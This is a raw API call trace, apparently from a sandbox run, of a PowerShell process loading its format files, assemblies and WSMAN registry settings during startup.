	[0300.065] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xae8539b, Data2=0x7af6, Data3=0x41ad, Data4=([0]=0x9a, [1]=0xa5, [2]=0xe5, [3]=0x14, [4]=0xb1, [5]=0x67, [6]=0x5f, [7]=0xe8))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc8605559, Data2=0xa5ff, Data3=0x4c68, Data4=([0]=0x93, [1]=0xab, [2]=0x85, [3]=0x75, [4]=0x13, [5]=0xaa, [6]=0x2f, [7]=0xf0))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x4fb57fe3, Data2=0xf835, Data3=0x485c, Data4=([0]=0xa0, [1]=0x28, [2]=0xc1, [3]=0xf2, [4]=0xd3, [5]=0x15, [6]=0xeb, [7]=0x6c))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x4732cdf1, Data2=0xbbd6, Data3=0x457f, Data4=([0]=0x89, [1]=0x8b, [2]=0xdf, [3]=0x2e, [4]=0x4c, [5]=0x7c, [6]=0x93, [7]=0x7))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xfd1a55fb, Data2=0xc42e, Data3=0x4b1c, Data4=([0]=0x83, [1]=0x68, [2]=0x9, [3]=0xaf, [4]=0x9e, [5]=0x69, [6]=0x2d, [7]=0x3))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x43b7b50a, Data2=0xa9ea, Data3=0x4301, Data4=([0]=0xb7, [1]=0x75, [2]=0xb1, [3]=0xa9, [4]=0x1e, [5]=0x79, [6]=0x61, [7]=0xd8))) returned 0x0
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xdd363fbb, Data2=0x1bf2, Data3=0x4d6b, Data4=([0]=0x8a, [1]=0x69, [2]=0x3d, [3]=0xe9, [4]=0x35, [5]=0x5d, [6]=0xf5, [7]=0x1))) returned 0x0
	[0300.065] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x7916654f, Data2=0xa36d, Data3=0x4ba4, Data4=([0]=0xb1, [1]=0x29, [2]=0xea, [3]=0xcb, [4]=0xd5, [5]=0xb7, [6]=0x6e, [7]=0x97))) returned 0x0
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x345368a2, Data2=0xa15e, Data3=0x4480, Data4=([0]=0xb4, [1]=0x0, [2]=0xc8, [3]=0x21, [4]=0x0, [5]=0x46, [6]=0x89, [7]=0x40))) returned 0x0
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x51952ed8, Data2=0xa715, Data3=0x4fc2, Data4=([0]=0x93, [1]=0x16, [2]=0xd6, [3]=0xaa, [4]=0x86, [5]=0x12, [6]=0x8e, [7]=0x97))) returned 0x0
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x212e38f8, Data2=0xf139, Data3=0x45f3, Data4=([0]=0xa1, [1]=0x6, [2]=0x6b, [3]=0x8, [4]=0xa0, [5]=0xe1, [6]=0x52, [7]=0x8a))) returned 0x0
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x61bc3e33, Data2=0xf568, Data3=0x4974, Data4=([0]=0xa6, [1]=0x7, [2]=0x38, [3]=0x8, [4]=0x85, [5]=0xe2, [6]=0x22, [7]=0xbb))) returned 0x0
	[0300.066] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf6b7287c, Data2=0x8563, Data3=0x4e44, Data4=([0]=0x8b, [1]=0xf0, [2]=0x13, [3]=0xec, [4]=0xd7, [5]=0xf8, [6]=0xa9, [7]=0x1e))) returned 0x0
	[0300.066] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x2cf25f8e, Data2=0xaa27, Data3=0x41cd, Data4=([0]=0x96, [1]=0xda, [2]=0x84, [3]=0x9, [4]=0x8e, [5]=0x9c, [6]=0x30, [7]=0x83))) returned 0x0
	[0300.066] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.066] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.067] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.067] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.067] SetErrorMode (uMode=0x1) returned 0x1
	[0300.067] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0300.067] GetFileType (hFile=0x334) returned 0x1
	[0300.067] SetErrorMode (uMode=0x1) returned 0x1
	[0300.067] GetFileType (hFile=0x334) returned 0x1
	[0300.067] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.067] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.068] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.068] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.068] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x8b4, lpOverlapped=0x0) returned 1
	[0300.068] ReadFile (in: hFile=0x334, lpBuffer=0x315a934, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315a934*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.068] ReadFile (in: hFile=0x334, lpBuffer=0x315b518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x315b518*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.068] SetErrorMode (uMode=0x1) returned 0x1
	[0300.068] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0300.068] SetErrorMode (uMode=0x1) returned 0x1
	[0300.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x334) returned 0x0
	[0300.069] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0300.069] CoTaskMemAlloc (cb=0x5a) returned 0x3cf290
	[0300.069] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3cf290, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0300.069] CoTaskMemFree (pv=0x3cf290) 
	[0300.069] RegCloseKey (hKey=0x334) returned 0x0
	[0300.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0300.070] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe0f94c82, Data2=0x348, Data3=0x43d7, Data4=([0]=0x82, [1]=0xcb, [2]=0xec, [3]=0xd3, [4]=0xb5, [5]=0x58, [6]=0xef, [7]=0xbb))) returned 0x0
	[0300.070] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9d1090a1, Data2=0xa2e1, Data3=0x4e6d, Data4=([0]=0xa4, [1]=0x5c, [2]=0xc, [3]=0xeb, [4]=0xed, [5]=0x4a, [6]=0xb4, [7]=0xa0))) returned 0x0
	[0300.070] SetErrorMode (uMode=0x1) returned 0x1
	[0300.070] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0300.070] GetFileType (hFile=0x334) returned 0x1
	[0300.070] SetErrorMode (uMode=0x1) returned 0x1
	[0300.070] GetFileType (hFile=0x334) returned 0x1
	[0300.070] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0xe98, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3198900, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3198900*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.071] ReadFile (in: hFile=0x334, lpBuffer=0x3199300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x3199300*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.071] SetErrorMode (uMode=0x1) returned 0x1
	[0300.071] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0300.071] SetErrorMode (uMode=0x1) returned 0x1
	[0300.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.072] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x334) returned 0x0
	[0300.072] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0300.072] CoTaskMemAlloc (cb=0x5a) returned 0x3cf290
	[0300.072] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3cf290, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0300.072] CoTaskMemFree (pv=0x3cf290) 
	[0300.072] RegCloseKey (hKey=0x334) returned 0x0
	[0300.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0300.072] VirtualQuery (in: lpAddress=0x12ba00, lpBuffer=0x12c8c0, dwLength=0x30 | out: lpBuffer=0x12c8c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.073] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x35b77d28, Data2=0x60df, Data3=0x4b46, Data4=([0]=0x9e, [1]=0x69, [2]=0xbd, [3]=0xfc, [4]=0xcd, [5]=0x72, [6]=0xfb, [7]=0xa5))) returned 0x0
	[0300.073] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9cdc81a9, Data2=0x3b65, Data3=0x4f0d, Data4=([0]=0x90, [1]=0x47, [2]=0xb9, [3]=0xdf, [4]=0x61, [5]=0xdd, [6]=0xf6, [7]=0x11))) returned 0x0
	[0300.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0300.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0300.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0300.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0300.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0300.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0300.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0300.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0300.945] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.946] CoTaskMemFree (pv=0x3a7210) 
	[0300.947] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.947] CoTaskMemFree (pv=0x3a7210) 
	[0300.948] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.948] CoTaskMemFree (pv=0x3a7210) 
	[0300.949] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.949] CoTaskMemFree (pv=0x3a7210) 
	[0300.954] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.954] CoTaskMemFree (pv=0x3a7210) 
	[0300.955] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.955] CoTaskMemFree (pv=0x3a7210) 
	[0300.955] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0300.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.955] CoTaskMemFree (pv=0x3a7210) 
	[0300.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d178 | out: phkResult=0x12d178*=0x334) returned 0x0
	[0300.958] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d07c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d078, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d07c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d078*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0300.958] CoTaskMemFree (pv=0x0) 
	[0300.959] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0300.959] RegEnumValueW (in: hKey=0x334, dwIndex=0x0, lpValueName=0x35b1e0, lpcchValueName=0x12d128, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d128, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.959] CoTaskMemFree (pv=0x35b1e0) 
	[0300.959] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0300.959] RegEnumValueW (in: hKey=0x334, dwIndex=0x1, lpValueName=0x35b1e0, lpcchValueName=0x12d128, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d128, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.959] CoTaskMemFree (pv=0x35b1e0) 
	[0300.959] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0300.959] RegEnumValueW (in: hKey=0x334, dwIndex=0x2, lpValueName=0x35b1e0, lpcchValueName=0x12d128, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d128, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0300.959] CoTaskMemFree (pv=0x35b1e0) 
	[0300.959] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d10c, lpData=0x0, lpcbData=0x12d108*=0x0 | out: lpType=0x12d10c*=0x1, lpData=0x0, lpcbData=0x12d108*=0x8) returned 0x0
	[0300.959] CoTaskMemAlloc (cb=0xc) returned 0x3c0e10
	[0300.959] RegQueryValueExW (in: hKey=0x334, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d0dc, lpData=0x3c0e10, lpcbData=0x12d0d8*=0x8 | out: lpType=0x12d0dc*=0x1, lpData="2.0", lpcbData=0x12d0d8*=0x8) returned 0x0
	[0300.959] CoTaskMemFree (pv=0x3c0e10) 
	[0301.192] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0c8 | out: phkResult=0x12d0c8*=0x330) returned 0x0
	[0301.192] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12cfcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12cfc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12cfcc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12cfc8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.192] CoTaskMemFree (pv=0x0) 
